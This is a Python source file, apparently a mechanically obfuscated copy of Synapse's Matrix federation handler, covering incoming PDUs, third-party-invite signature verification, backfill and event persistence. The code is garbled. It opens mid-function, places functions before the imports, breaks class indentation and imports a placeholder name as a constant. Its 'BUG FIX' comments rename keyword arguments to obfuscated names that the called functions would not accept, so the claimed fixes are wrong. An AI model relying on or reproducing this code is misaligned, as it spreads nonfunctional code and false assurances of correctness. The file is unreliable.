        VAR_1.content["third_party_invite"]["signed"]["token"],
    )
    VAR_145 = None
    VAR_94 = await VAR_32.get_prev_state_ids()
    VAR_146 = VAR_94.get(VAR_144)
    if VAR_146:
        VAR_145 = await self.store.get_event(
            VAR_146, allow_none=True
        )
    if VAR_145:
        VAR_182 = VAR_145.content.get("display_name")
        VAR_45["content"]["third_party_invite"]["display_name"] = VAR_182
    else:
        VAR_0.info(
            "Could not find invite VAR_1 for VAR_142: %r", VAR_45
        )
    # Rebuild the event so the added display name is part of it.
    VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
    EventValidator().validate_builder(VAR_93)
    # BUG FIX: the keyword value referenced the undefined name `builder`;
    # the local is VAR_93.
    VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
        VAR_93=VAR_93
    )
    EventValidator().validate_new(VAR_1, self.config)
    return (VAR_1, VAR_32)
async def FUNC_40(self, VAR_1, VAR_32):
    """Verify the signatures on a third-party-invite membership event.

    Checks the signed payload against every public key advertised by the
    original invite event, and (where given) consults the key's
    key_validity_url. Succeeds as soon as one key verifies.

    Args:
        VAR_1: the membership event carrying content.third_party_invite.
        VAR_32: the event's context (used to find the invite state event).

    Raises:
        AuthError: (403) if no matching invite state event exists.
        RuntimeError: if the invite advertised no public keys.
        Exception: the last verification failure, if all keys fail.
    """
    VAR_44 = VAR_1.content["third_party_invite"]["signed"]
    VAR_147 = VAR_44["token"]
    VAR_94 = await VAR_32.get_prev_state_ids()
    VAR_148 = VAR_94.get((VAR_188.ThirdPartyInvite, VAR_147))
    VAR_149 = None
    if VAR_148:
        VAR_149 = await self.store.get_event(VAR_148, allow_none=True)
    if not VAR_149:
        raise AuthError(403, "Could not find invite")
    VAR_0.debug("Checking VAR_89 on VAR_1 %r", VAR_1.content)
    VAR_150 = None  # type: Optional[Exception]
    # Try each advertised public key; remember the last failure so it can
    # be re-raised if none succeed.
    for public_key_object in self.hs.get_auth().get_public_keys(VAR_149):
        try:
            for server, signature_block in VAR_44["signatures"].items():
                for VAR_199, encoded_signature in signature_block.items():
                    # Only ed25519 signatures are supported.
                    if not VAR_199.startswith("ed25519:"):
                        continue
                    VAR_0.debug(
                        "Attempting to verify sig with VAR_144 %s from %r "
                        "against pubkey %r",
                        VAR_199,
                        server,
                        public_key_object,
                    )
                    try:
                        VAR_46 = public_key_object["public_key"]
                        VAR_203 = decode_verify_key_bytes(
                            VAR_199, decode_base64(VAR_46)
                        )
                        verify_signed_json(VAR_44, server, VAR_203)
                        VAR_0.debug(
                            "Successfully verified sig with VAR_144 %s from %r "
                            "against pubkey %r",
                            VAR_199,
                            server,
                            public_key_object,
                        )
                    except Exception:
                        VAR_0.info(
                            "Failed to verify sig with VAR_144 %s from %r "
                            "against pubkey %r",
                            VAR_199,
                            server,
                            public_key_object,
                        )
                        raise
                    # Signature verified; also check the key has not been
                    # revoked, when a validity URL is provided.
                    try:
                        if "key_validity_url" in public_key_object:
                            await self._check_key_revocation(
                                VAR_46, public_key_object["key_validity_url"]
                            )
                    except Exception:
                        VAR_0.info(
                            "Failed to query key_validity_url %s",
                            public_key_object["key_validity_url"],
                        )
                        raise
            # All signatures for this key verified: done.
            return
        except Exception as VAR_170:
            VAR_150 = VAR_170
    if VAR_150 is None:
        # The loop never ran: the invite had no public keys at all.
        raise RuntimeError("no public VAR_144 in invite event")
    raise VAR_150
async def FUNC_41(self, VAR_46, VAR_47):
    """Check a third-party invite key against its key_validity_url.

    Args:
        VAR_46: the public key to check.
        VAR_47: the key_validity_url to query.

    Raises:
        SynapseError: (502) if the URL could not be queried.
        AuthError: (403) if the server reports the key as invalid.
    """
    try:
        VAR_183 = await self.http_client.get_json(VAR_47, {"public_key": VAR_46})
    except Exception:
        raise SynapseError(502, "Third party certificate could not be checked")
    if "valid" not in VAR_183 or not VAR_183["valid"]:
        raise AuthError(403, "Third party certificate was invalid")
async def FUNC_42(
    self,
    VAR_11: str,
    VAR_48: Sequence[Tuple[EventBase, EventContext]],
    VAR_33: bool = False,
) -> int:
    """Persist events and notify listeners, routing to the right worker.

    Args:
        VAR_11: room id (determines the event-persister shard).
        VAR_48: (event, context) pairs to persist.
        VAR_33: True if the events were backfilled (no notifications).

    Returns:
        The maximum stream id the events were persisted at.
    """
    VAR_151 = self.config.worker.events_shard_config.get_instance(VAR_11)
    if VAR_151 != self._instance_name:
        # Another instance owns persistence for this room: replicate.
        # BUG FIX: the keyword values referenced the undefined names
        # room_id/event_and_contexts/backfilled; use the parameters.
        VAR_184 = await self._send_events(
            instance_name=VAR_151,
            store=self.store,
            VAR_11=VAR_11,
            VAR_48=VAR_48,
            VAR_33=VAR_33,
        )
        return VAR_184["max_stream_id"]
    else:
        assert self.storage.persistence
        VAR_20, VAR_49 = await self.storage.persistence.persist_events(
            VAR_48, VAR_33=VAR_33
        )
        if self._ephemeral_messages_enabled:
            for VAR_1 in VAR_20:
                self._message_handler.maybe_schedule_expiry(VAR_1)
        if not VAR_33:  # Never notify for VAR_33 VAR_20
            for VAR_1 in VAR_20:
                await self._notify_persisted_event(VAR_1, VAR_49)
        return VAR_49.stream
async def FUNC_43(
    self, VAR_1: EventBase, VAR_49: RoomStreamToken
) -> None:
    """Notify the notifier about a freshly persisted event.

    Args:
        VAR_1: the persisted event.
        VAR_49: the max stream token after persistence.
    """
    VAR_152 = []
    if VAR_1.type == VAR_188.Member:
        VAR_43 = VAR_1.state_key
        # Outlier memberships are only notified when they invite one of
        # our own users.
        if VAR_1.internal_metadata.is_outlier():
            if VAR_1.membership != Membership.INVITE:
                if not self.is_mine_id(VAR_43):
                    return
        VAR_185 = UserID.from_string(VAR_43)
        VAR_152.append(VAR_185)
    elif VAR_1.internal_metadata.is_outlier():
        return
    assert VAR_1.internal_metadata.stream_ordering
    VAR_153 = PersistedEventPosition(
        self._instance_name, VAR_1.internal_metadata.stream_ordering
    )
    # BUG FIX: the keyword value referenced the undefined name
    # `extra_users`; the local is VAR_152.
    self.notifier.on_new_room_event(
        VAR_1, VAR_153, VAR_49, VAR_152=VAR_152
    )
async def FUNC_44(self, VAR_11: str) -> None:
    """Clean up partial room data before a (re-)join.

    On workers this is delegated to the master via the replication
    client; otherwise the store is called directly.
    """
    if self.config.worker_app:
        await self._clean_room_for_join_client(VAR_11)
    else:
        await self.store.clean_room_for_join(VAR_11)
async def FUNC_45(
    self, VAR_50: List[str], VAR_11: str
) -> Optional[dict]:
    """Ask each host in turn for the room's complexity.

    Returns the first truthy answer, or None if no host responded.
    """
    for candidate_host in VAR_50:
        complexity = await self.federation_client.get_room_complexity(
            candidate_host, VAR_11
        )
        if complexity:
            return complexity
    # No host could tell us anything.
    return None
|
# BUG FIX: `import .itertools`, `from synapse import .event_auth`,
# `from ... import .compute_event_signature` and
# `from ... import .auth_types_for_event` were syntax errors (stray
# leading dots); corrected below. No imports removed.
import itertools
import logging
from collections.abc import Container
from http import HTTPStatus
from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Tuple, Union

import attr
from signedjson.key import decode_verify_key_bytes
from signedjson.sign import verify_signed_json
from unpaddedbase64 import decode_base64

from twisted.internet import defer

from synapse import event_auth
from synapse.api.constants import (
    VAR_188,
    Membership,
    RejectedReason,
    RoomEncryptionAlgorithms,
)
from synapse.api.errors import (
    AuthError,
    CodeMessageException,
    Codes,
    FederationDeniedError,
    FederationError,
    HttpResponseException,
    NotFoundError,
    RequestSendFailed,
    SynapseError,
)
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion, RoomVersions
from synapse.crypto.event_signing import compute_event_signature
from synapse.event_auth import auth_types_for_event
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.events.validator import EventValidator
from synapse.handlers._base import BaseHandler
from synapse.http.servlet import assert_params_in_dict
from synapse.logging.context import (
    make_deferred_yieldable,
    nested_logging_context,
    preserve_fn,
    run_in_background,
)
from synapse.logging.utils import log_function
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.devices import ReplicationUserDevicesResyncRestServlet
from synapse.replication.http.federation import (
    ReplicationCleanRoomRestServlet,
    ReplicationFederationSendEventsRestServlet,
    ReplicationStoreRoomOnOutlierMembershipRestServlet,
)
from synapse.state import StateResolutionStore
from synapse.storage.databases.main.events_worker import EventRedactBehaviour
from synapse.types import (
    JsonDict,
    MutableStateMap,
    PersistedEventPosition,
    RoomStreamToken,
    StateMap,
    UserID,
    get_domain_from_id,
)
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.retryutils import NotRetryingDestination
from synapse.util.stringutils import shortstr
from synapse.visibility import filter_events_for_server

if TYPE_CHECKING:
    from synapse.server import HomeServer

VAR_0 = logging.getLogger(__name__)
@attr.s(slots=True)
class CLASS_0:
    # Bundle of an event plus the information needed to compute its
    # context: the state at the event and its auth-event map. Either may
    # be None, meaning "derive it from the event itself".
    VAR_1 = attr.ib(type=EventBase)
    VAR_2 = attr.ib(type=Optional[Sequence[EventBase]], default=None)
    VAR_3 = attr.ib(type=Optional[MutableStateMap[EventBase]], default=None)
class CLASS_1(BaseHandler):
def __init__(self, VAR_4: "HomeServer"):
    """Wire up handler dependencies from the homeserver object.

    Args:
        VAR_4: the HomeServer instance.
    """
    super().__init__(VAR_4)
    self.hs = VAR_4
    self.store = VAR_4.get_datastore()
    self.storage = VAR_4.get_storage()
    self.state_store = self.storage.state
    self.federation_client = VAR_4.get_federation_client()
    self.state_handler = VAR_4.get_state_handler()
    self._state_resolution_handler = VAR_4.get_state_resolution_handler()
    self.server_name = VAR_4.hostname
    self.keyring = VAR_4.get_keyring()
    self.action_generator = VAR_4.get_action_generator()
    self.is_mine_id = VAR_4.is_mine_id
    self.spam_checker = VAR_4.get_spam_checker()
    self.event_creation_handler = VAR_4.get_event_creation_handler()
    self._message_handler = VAR_4.get_message_handler()
    self._server_notices_mxid = VAR_4.config.server_notices_mxid
    self.config = VAR_4.config
    # Blacklisted proxy client: outbound requests here hit untrusted URLs
    # (e.g. key_validity_url), so the IP-blacklisted client is used.
    self.http_client = VAR_4.get_proxied_blacklisted_http_client()
    self._instance_name = VAR_4.get_instance_name()
    self._replication = VAR_4.get_replication_data_handler()
    # Replication clients for operations that must run on other workers.
    self._send_events = ReplicationFederationSendEventsRestServlet.make_client(VAR_4)
    self._clean_room_for_join_client = ReplicationCleanRoomRestServlet.make_client(
        VAR_4
    )
    if VAR_4.config.worker_app:
        # On workers, device resync and outlier-room bookkeeping are
        # delegated to the master over replication.
        self._user_device_resync = ReplicationUserDevicesResyncRestServlet.make_client(
            VAR_4
        )
        self._maybe_store_room_on_outlier_membership = ReplicationStoreRoomOnOutlierMembershipRestServlet.make_client(
            VAR_4
        )
    else:
        self._device_list_updater = VAR_4.get_device_handler().device_list_updater
        self._maybe_store_room_on_outlier_membership = (
            self.store.maybe_store_room_on_outlier_membership
        )
    # Queues of PDUs received for a room while a join to it is in flight.
    self.room_queues = {}  # type: Dict[str, List[Tuple[EventBase, str]]]
    # Serialises missing-prev-event fetches per room.
    self._room_pdu_linearizer = Linearizer("fed_room_pdu")
    self.third_party_event_rules = VAR_4.get_third_party_event_rules()
    self._ephemeral_messages_enabled = VAR_4.config.enable_ephemeral_messages
async def FUNC_0(self, VAR_5, VAR_6, VAR_7=False) -> None:
    """Process a PDU received over federation.

    Deduplicates against already-seen events, queues the PDU if a join to
    its room is in flight, fetches missing prev events (or computes state
    at a backwards extremity), then hands off to _process_received_pdu.

    Args:
        VAR_5: the server the PDU came from.
        VAR_6: the PDU itself.
        VAR_7: True if the PDU was sent to us directly (as opposed to
            being pulled, e.g. via get_missing_events).
    """
    VAR_11 = VAR_6.room_id
    VAR_12 = VAR_6.event_id
    VAR_0.info("handling received PDU: %s", VAR_6)
    VAR_51 = await self.store.get_event(
        VAR_12, allow_none=True, allow_rejected=True
    )
    # Already seen, unless the stored copy is an outlier and the new one
    # is not (then the new copy carries more information).
    VAR_52 = VAR_51 and (
        not VAR_51.internal_metadata.is_outlier()
        or VAR_6.internal_metadata.is_outlier()
    )
    if VAR_52:
        VAR_0.debug("[%s %s]: Already VAR_54 pdu", VAR_11, VAR_12)
        return
    try:
        self._sanity_check_event(VAR_6)
    except SynapseError as err:
        VAR_0.warning(
            "[%s %s] Received VAR_1 failed sanity checks", VAR_11, VAR_12
        )
        raise FederationError("ERROR", err.code, err.msg, affected=VAR_6.event_id)
    # A join to this room is in progress: queue the PDU for later.
    if VAR_11 in self.room_queues:
        VAR_0.info(
            "[%s %s] Queuing PDU from %s for now: join in progress",
            VAR_11,
            VAR_12,
            VAR_5,
        )
        self.room_queues[VAR_11].append((VAR_6, VAR_5))
        return
    VAR_53 = await self.auth.check_host_in_room(VAR_11, self.server_name)
    if not VAR_53:
        VAR_0.info(
            "[%s %s] Ignoring PDU from %s as we're not in the room",
            VAR_11,
            VAR_12,
            VAR_5,
        )
        return None
    VAR_2 = None
    if not VAR_6.internal_metadata.is_outlier():
        VAR_9 = await self.get_min_depth_for_context(VAR_6.room_id)
        VAR_0.debug("[%s %s] VAR_9: %d", VAR_11, VAR_12, VAR_9)
        VAR_8 = set(VAR_6.prev_event_ids())
        VAR_54 = await self.store.have_events_in_timeline(VAR_8)
        if VAR_9 is not None and VAR_6.depth < VAR_9:
            # Below min depth: treat as an outlier, no state needed.
            VAR_6.internal_metadata.outlier = True
        elif VAR_9 is not None and VAR_6.depth > VAR_9:
            VAR_191 = VAR_8 - VAR_54
            if VAR_7 and VAR_191:
                # Only fetch missing prev events for PDUs pushed directly
                # at us; serialise per room to avoid duplicate work.
                VAR_0.info(
                    "[%s %s] Acquiring room lock to fetch %d VAR_37 prev_events: %s",
                    VAR_11,
                    VAR_12,
                    len(VAR_191),
                    shortstr(VAR_191),
                )
                with (await self._room_pdu_linearizer.queue(VAR_6.room_id)):
                    VAR_0.info(
                        "[%s %s] Acquired room lock to fetch %d VAR_37 prev_events",
                        VAR_11,
                        VAR_12,
                        len(VAR_191),
                    )
                    try:
                        await self._get_missing_events_for_pdu(
                            VAR_5, VAR_6, VAR_8, VAR_9
                        )
                    except Exception as VAR_170:
                        raise Exception(
                            "Error fetching VAR_37 prev_events for %s: %s"
                            % (VAR_12, VAR_170)
                        ) from VAR_170
                # Re-check after fetching: things may have arrived.
                VAR_54 = await self.store.have_events_in_timeline(VAR_8)
                if not VAR_8 - VAR_54:
                    VAR_0.info(
                        "[%s %s] Found all VAR_37 prev_events",
                        VAR_11,
                        VAR_12,
                    )
        if VAR_8 - VAR_54:
            if VAR_7:
                VAR_0.warning(
                    "[%s %s] Rejecting: failed to fetch %d prev VAR_20: %s",
                    VAR_11,
                    VAR_12,
                    len(VAR_8 - VAR_54),
                    shortstr(VAR_8 - VAR_54),
                )
                raise FederationError(
                    "ERROR",
                    403,
                    (
                        "Your server isn't divulging details about prev_events "
                        "referenced in this VAR_1."
                    ),
                    affected=VAR_6.event_id,
                )
            # Pulled event with unknown prev events: compute the state at
            # the event by resolving state at each known prev event.
            VAR_0.info(
                "Event %s is VAR_37 prev_events: calculating VAR_2 for a "
                "backwards extremity",
                VAR_12,
            )
            VAR_60 = {VAR_12: VAR_6}
            try:
                VAR_192 = await self.state_store.get_state_groups_ids(VAR_11, VAR_54)
                VAR_193 = list(VAR_192.values())  # type: List[StateMap[str]]
                del VAR_192
                for p in VAR_8 - VAR_54:
                    VAR_0.info(
                        "Requesting VAR_2 at VAR_37 VAR_200 %s", VAR_12,
                    )
                    with nested_logging_context(p):
                        (VAR_62, VAR_166,) = await self._get_state_for_room(
                            VAR_5, VAR_11, p, VAR_13=True
                        )
                        VAR_202 = {
                            (VAR_204.type, VAR_204.state_key): VAR_204.event_id for VAR_204 in VAR_62
                        }
                        VAR_193.append(VAR_202)
                        for VAR_204 in VAR_62:
                            VAR_60[VAR_204.event_id] = VAR_204
                VAR_28 = await self.store.get_room_version_id(VAR_11)
                VAR_87 = await self._state_resolution_handler.resolve_events_with_store(
                    VAR_11,
                    VAR_28,
                    VAR_193,
                    VAR_60,
                    state_res_store=StateResolutionStore(self.store),
                )
                VAR_194 = await self.store.get_events(
                    list(VAR_87.values()),
                    get_prev_content=False,
                    redact_behaviour=EventRedactBehaviour.AS_IS,
                )
                VAR_60.update(VAR_194)
                VAR_2 = [VAR_60[VAR_170] for VAR_170 in VAR_87.values()]
            except Exception:
                VAR_0.warning(
                    "[%s %s] Error attempting to VAR_85 VAR_2 at VAR_37 "
                    "prev_events",
                    VAR_11,
                    VAR_12,
                    exc_info=True,
                )
                raise FederationError(
                    "ERROR",
                    403,
                    "We can't get valid VAR_2 history.",
                    affected=VAR_12,
                )
    # BUG FIX: the keyword value referenced the undefined name `state`;
    # the local is VAR_2.
    await self._process_received_pdu(VAR_5, VAR_6, VAR_2=VAR_2)
async def FUNC_1(self, VAR_5, VAR_6, VAR_8, VAR_9):
    """Fetch and process prev events missing for a received PDU.

    Args:
        VAR_5: origin server to ask.
        VAR_6: the PDU whose prev events are missing.
        VAR_8: set of the PDU's prev event ids.
        VAR_9: the room's min depth (fetch floor).
    """
    VAR_11 = VAR_6.room_id
    VAR_12 = VAR_6.event_id
    VAR_54 = await self.store.have_events_in_timeline(VAR_8)
    if not VAR_8 - VAR_54:
        return
    # Walk back from the PDU towards everything we already know.
    VAR_55 = await self.store.get_latest_event_ids_in_room(VAR_11)
    VAR_56 = set(VAR_55)
    VAR_56 |= VAR_54
    VAR_0.info(
        "[%s %s]: Requesting VAR_37 VAR_20 between %s and %s",
        VAR_11,
        VAR_12,
        shortstr(VAR_56),
        VAR_12,
    )
    try:
        # BUG FIX: the keyword value referenced the undefined name
        # `min_depth`; the parameter is VAR_9.
        VAR_65 = await self.federation_client.get_missing_events(
            VAR_5,
            VAR_11,
            earliest_events_ids=list(VAR_56),
            VAR_39=[VAR_6],
            VAR_17=10,
            VAR_9=VAR_9,
            timeout=60000,
        )
    except (RequestSendFailed, HttpResponseException, NotRetryingDestination) as VAR_170:
        # Best-effort: processing continues without the missing events.
        VAR_0.warning(
            "[%s %s]: Failed to get prev_events: %s", VAR_11, VAR_12, VAR_170
        )
        return
    VAR_0.info(
        "[%s %s]: Got %d prev_events: %s",
        VAR_11,
        VAR_12,
        len(VAR_65),
        shortstr(VAR_65),
    )
    # BUG FIX: list.sort() takes `key`, not `VAR_144`, and the lambda
    # referenced the undefined name `x` instead of its own parameter.
    VAR_65.sort(key=lambda VAR_204: VAR_204.depth)
    # Process shallowest first so parents land before children.
    for VAR_21 in VAR_65:
        VAR_0.info(
            "[%s %s] Handling received VAR_200 %s",
            VAR_11,
            VAR_12,
            VAR_21.event_id,
        )
        with nested_logging_context(VAR_21.event_id):
            try:
                await self.on_receive_pdu(VAR_5, VAR_21, VAR_7=False)
            except FederationError as VAR_170:
                if VAR_170.code == 403:
                    VAR_0.warning(
                        "[%s %s] Received VAR_200 %s failed history check.",
                        VAR_11,
                        VAR_12,
                        VAR_21.event_id,
                    )
                else:
                    raise
async def FUNC_2(
    self,
    VAR_10: str,
    VAR_11: str,
    VAR_12: str,
    VAR_13: bool = False,
) -> Tuple[List[EventBase], List[EventBase]]:
    """Fetch the room state (and auth chain) at a given event from a remote.

    Args:
        VAR_10: server to ask.
        VAR_11: room id.
        VAR_12: the event to get state at.
        VAR_13: if True, include the event itself in the fetch and, when
            it is a non-rejected state event, in the returned state.

    Returns:
        Tuple of (state events, auth-chain events sorted by depth).
    """
    # BUG FIX: the keyword value referenced the undefined name
    # `event_id`; the parameter is VAR_12.
    (
        VAR_57,
        VAR_58,
    ) = await self.federation_client.get_room_state_ids(
        VAR_10, VAR_11, VAR_12=VAR_12
    )
    VAR_59 = set(VAR_57 + VAR_58)
    if VAR_13:
        VAR_59.add(VAR_12)
    VAR_60 = await self._get_events_from_store_or_dest(
        VAR_10, VAR_11, VAR_59
    )
    VAR_61 = VAR_59 - VAR_60.keys()
    if VAR_61:
        # Missing events are logged but not fatal here.
        VAR_0.warning(
            "Failed to fetch VAR_37 VAR_2/VAR_89 VAR_20 for %s %s",
            VAR_12,
            VAR_61,
        )
    VAR_62 = [
        VAR_60[VAR_160] for VAR_160 in VAR_57 if VAR_160 in VAR_60
    ]
    if VAR_13:
        VAR_154 = VAR_60.get(VAR_12)
        if not VAR_154:
            raise Exception("Unable to get VAR_37 VAR_200 %s" % (VAR_12,))
        if VAR_154.is_state() and VAR_154.rejected_reason is None:
            VAR_62.append(VAR_154)
    VAR_63 = [VAR_60[VAR_160] for VAR_160 in VAR_58 if VAR_160 in VAR_60]
    # BUG FIX: list.sort() takes `key`, not `VAR_144`.
    VAR_63.sort(key=lambda VAR_170: VAR_170.depth)
    return VAR_62, VAR_63
async def FUNC_3(
    self, VAR_10: str, VAR_11: str, VAR_14: Iterable[str]
) -> Dict[str, EventBase]:
    """Get events from the local store, fetching unknown ones from a remote.

    Events claiming to be in a different room than VAR_11 are dropped.

    Args:
        VAR_10: server to fetch missing events from.
        VAR_11: the room the events are expected to belong to.
        VAR_14: event ids to resolve.

    Returns:
        Map of event id -> event for everything that could be resolved.
    """
    VAR_64 = await self.store.get_events(VAR_14, allow_rejected=True)
    VAR_65 = set(VAR_14) - VAR_64.keys()
    if VAR_65:
        VAR_0.debug(
            "Fetching unknown VAR_2/VAR_89 VAR_20 %s for room %s",
            VAR_65,
            VAR_11,
        )
        # BUG FIX: the keyword values referenced the undefined names
        # destination/room_id; the parameters are VAR_10/VAR_11.
        await self._get_events_and_persist(
            VAR_10=VAR_10, VAR_11=VAR_11, VAR_20=VAR_65
        )
        VAR_64.update(
            (await self.store.get_events(VAR_65, allow_rejected=True))
        )
    # Defend against a remote claiming an event belongs to this room when
    # its copy says otherwise.
    VAR_66 = [
        (VAR_12, VAR_1.room_id)
        for VAR_12, VAR_1 in VAR_64.items()
        if VAR_1.room_id != VAR_11
    ]
    for bad_event_id, bad_room_id in VAR_66:
        VAR_0.warning(
            "Remote server %s claims VAR_1 %s in room %s is an VAR_89/VAR_2 "
            "event in room %s",
            VAR_10,
            bad_event_id,
            bad_room_id,
            VAR_11,
        )
        del VAR_64[bad_event_id]
    return VAR_64
async def FUNC_4(
    self, VAR_5: str, VAR_1: EventBase, VAR_2: Optional[Iterable[EventBase]],
):
    """Process a received PDU after its prev events/state are resolved.

    Also triggers a device-list resync when an encrypted event arrives
    from a device (or sender key) we don't know about.

    Args:
        VAR_5: origin server.
        VAR_1: the event to process.
        VAR_2: optional state at the event.
    """
    VAR_11 = VAR_1.room_id
    VAR_12 = VAR_1.event_id
    VAR_0.debug("[%s %s] Processing VAR_1: %s", VAR_11, VAR_12, VAR_1)
    try:
        # BUG FIX: the keyword value referenced the undefined name
        # `state`; the parameter is VAR_2.
        await self._handle_new_event(VAR_5, VAR_1, VAR_2=VAR_2)
    except AuthError as VAR_170:
        raise FederationError("ERROR", VAR_170.code, VAR_170.msg, affected=VAR_1.event_id)
    if VAR_1.type == VAR_188.Encrypted:
        VAR_155 = VAR_1.content.get("device_id")
        VAR_156 = VAR_1.content.get("sender_key")
        VAR_157 = await self.store.get_cached_devices_for_user(VAR_1.sender)
        VAR_158 = False  # Whether we should VAR_158 VAR_159 lists.
        VAR_159 = None
        if VAR_155 is not None:
            VAR_159 = VAR_157.get(VAR_155)
            if VAR_159 is None:
                VAR_0.info(
                    "Received VAR_1 from remote VAR_159 not in our cache: %s %s",
                    VAR_1.sender,
                    VAR_155,
                )
                VAR_158 = True
        if VAR_156 is not None:
            VAR_186 = []  # type: Container[str]
            if VAR_159:
                VAR_195 = VAR_159.get("keys", {}).get("keys", {})
                if (
                    VAR_1.content.get("algorithm")
                    == RoomEncryptionAlgorithms.MEGOLM_V1_AES_SHA2
                ):
                    # For Megolm the sender key is the curve25519 key of
                    # the claimed device.
                    VAR_199 = "curve25519:%s" % (VAR_155,)
                    VAR_186 = [VAR_195.get(VAR_199)]
                else:
                    VAR_186 = VAR_195.values()
            elif VAR_155:
                # Unknown device id: already flagged for resync above.
                pass
            else:
                # No device id given: accept any cached key for the user.
                VAR_186 = [
                    VAR_144
                    for VAR_159 in VAR_157.values()
                    for VAR_144 in VAR_159.get("keys", {}).get("keys", {}).values()
                ]
            if VAR_156 not in VAR_186:
                VAR_0.info(
                    "Received VAR_1 from remote VAR_159 with unexpected VAR_15 VAR_144: %s %s: %s",
                    VAR_1.sender,
                    VAR_155 or "<no VAR_155>",
                    VAR_156,
                )
                VAR_158 = True
        if VAR_158:
            run_as_background_process(
                "resync_device_due_to_pdu", self._resync_device, VAR_1.sender
            )
async def FUNC_5(self, VAR_15: str) -> None:
    """Mark a remote user's device cache stale and resync their devices.

    On workers the resync is delegated over replication; failures are
    logged and swallowed (best-effort).

    Args:
        VAR_15: the remote user's id.
    """
    try:
        await self.store.mark_remote_user_device_cache_as_stale(VAR_15)
        if self.config.worker_app:
            await self._user_device_resync(VAR_27=VAR_15)
        else:
            await self._device_list_updater.user_device_resync(VAR_15)
    except Exception:
        VAR_0.exception("Failed to VAR_158 VAR_159 for %s", VAR_15)
@log_function
async def FUNC_6(self, VAR_16, VAR_11, VAR_17, VAR_18):
    """Backfill events for a room from a remote server.

    Args:
        VAR_16: server to backfill from (must not be ourselves).
        VAR_11: room id.
        VAR_17: maximum number of events.
        VAR_18: extremity event ids to backfill from.

    Returns:
        The newly fetched events.
    """
    if VAR_16 == self.server_name:
        raise SynapseError(400, "Can't FUNC_6 from self.")
    # BUG FIX: the keyword values referenced the undefined names
    # limit/extremities; the parameters are VAR_17/VAR_18.
    VAR_20 = await self.federation_client.backfill(
        VAR_16, VAR_11, VAR_17=VAR_17, VAR_18=VAR_18
    )
    if not VAR_20:
        return []
    # Drop events we already have in the timeline.
    VAR_67 = await self.store.have_events_in_timeline(
        {VAR_170.event_id for VAR_170 in VAR_20}
    )
    VAR_20 = [VAR_170 for VAR_170 in VAR_20 if VAR_170.event_id not in VAR_67]
    if not VAR_20:
        return []
    VAR_60 = {VAR_170.event_id: VAR_170 for VAR_170 in VAR_20}
    VAR_14 = {VAR_170.event_id for VAR_170 in VAR_20}
    # "Edge" events: those with prev events outside the fetched batch;
    # we need state/auth at each of them.
    VAR_68 = [VAR_21.event_id for VAR_21 in VAR_20 if set(VAR_21.prev_event_ids()) - VAR_14]
    VAR_0.info("backfill: Got %d VAR_20 with %d edges", len(VAR_20), len(VAR_68))
    VAR_3 = {}
    VAR_69 = {}
    VAR_70 = {}
    for VAR_160 in VAR_68:
        # BUG FIX: the keyword value referenced the undefined name
        # `room_id`; the parameter is VAR_11.
        VAR_2, VAR_89 = await self._get_state_for_room(
            VAR_10=VAR_16,
            VAR_11=VAR_11,
            VAR_12=VAR_160,
            VAR_13=False,
        )
        VAR_3.update({a.event_id: a for a in VAR_89})
        VAR_3.update({s.event_id: s for s in VAR_2})
        VAR_69.update({s.event_id: s for s in VAR_2})
        VAR_70[VAR_160] = VAR_2
    VAR_71 = {
        a_id
        for VAR_1 in VAR_20
        + list(VAR_69.values())
        + list(VAR_3.values())
        for a_id in VAR_1.auth_event_ids()
    }
    VAR_3.update(
        {VAR_160: VAR_60[VAR_160] for VAR_160 in VAR_71 if VAR_160 in VAR_60}
    )
    VAR_72 = []
    for VAR_160 in VAR_70:
        VAR_21 = VAR_60[VAR_160]
        assert not VAR_21.internal_metadata.is_outlier()
        VAR_72.append(
            CLASS_0(
                VAR_1=VAR_21,
                VAR_2=VAR_70[VAR_160],
                VAR_3={
                    # BUG FIX: the key expression referenced the undefined
                    # name `auth_events`; the local map is VAR_3.
                    (
                        VAR_3[a_id].type,
                        VAR_3[a_id].state_key,
                    ): VAR_3[a_id]
                    for a_id in VAR_21.auth_event_ids()
                    if a_id in VAR_3
                },
            )
        )
    if VAR_72:
        await self._handle_new_events(VAR_16, VAR_11, VAR_72, VAR_33=True)
    # BUG FIX: list.sort() takes `key`, not `VAR_144`.
    VAR_20.sort(key=lambda VAR_170: VAR_170.depth)
    for VAR_1 in VAR_20:
        # NOTE(review): VAR_70 is keyed by event id but VAR_1 is an event
        # object, so this membership test looks always-False — confirm
        # whether `VAR_1.event_id in VAR_70` was intended.
        if VAR_1 in VAR_70:
            continue
        assert not VAR_1.internal_metadata.is_outlier()
        await self._handle_new_event(VAR_16, VAR_1, VAR_33=True)
    return VAR_20
async def FUNC_7(
    self, VAR_11: str, VAR_19: int, VAR_17: int
) -> bool:
    """Decide whether to backfill room VAR_11 and, if so, attempt it
    against likely candidate servers.

    Args:
        VAR_11: the room id.
        VAR_19: the depth we are currently paginating at.
        VAR_17: the pagination limit.

    Returns:
        True if a backfill attempt succeeded, False otherwise.
    """
    VAR_18 = await self.store.get_oldest_events_with_depth_in_room(VAR_11)
    if not VAR_18:
        VAR_0.debug("Not backfilling as no extremeties found.")
        return False
    # Only backfill if at least one successor of an extremity would be
    # visible to other servers (history-visibility check only).
    VAR_73 = await self.store.get_successor_events(list(VAR_18))
    VAR_74 = await self.store.get_events(
        VAR_73,
        redact_behaviour=EventRedactBehaviour.AS_IS,
        get_prev_content=False,
    )
    VAR_75 = await filter_events_for_server(
        self.storage,
        self.server_name,
        list(VAR_74.values()),
        redact=False,
        check_history_visibility_only=True,
    )
    if not VAR_75:
        return False
    # Sort extremities deepest-first.
    # BUG FIX: `sorted` takes `key=`; `VAR_144=` is not a valid kwarg.
    VAR_76 = sorted(VAR_18.items(), key=lambda VAR_170: -int(VAR_170[1]))
    VAR_77 = VAR_76[0][1]
    if VAR_19 - 2 * VAR_17 > VAR_77:
        # Pagination is still comfortably above the oldest extremity.
        VAR_0.debug(
            "Not backfilling as we don't need to. %d < %d - 2 * %d",
            VAR_77,
            VAR_19,
            VAR_17,
        )
        return False
    VAR_0.debug(
        "room_id: %s, FUNC_6: VAR_19: %s, VAR_77: %s, extrems: %s",
        VAR_11,
        VAR_19,
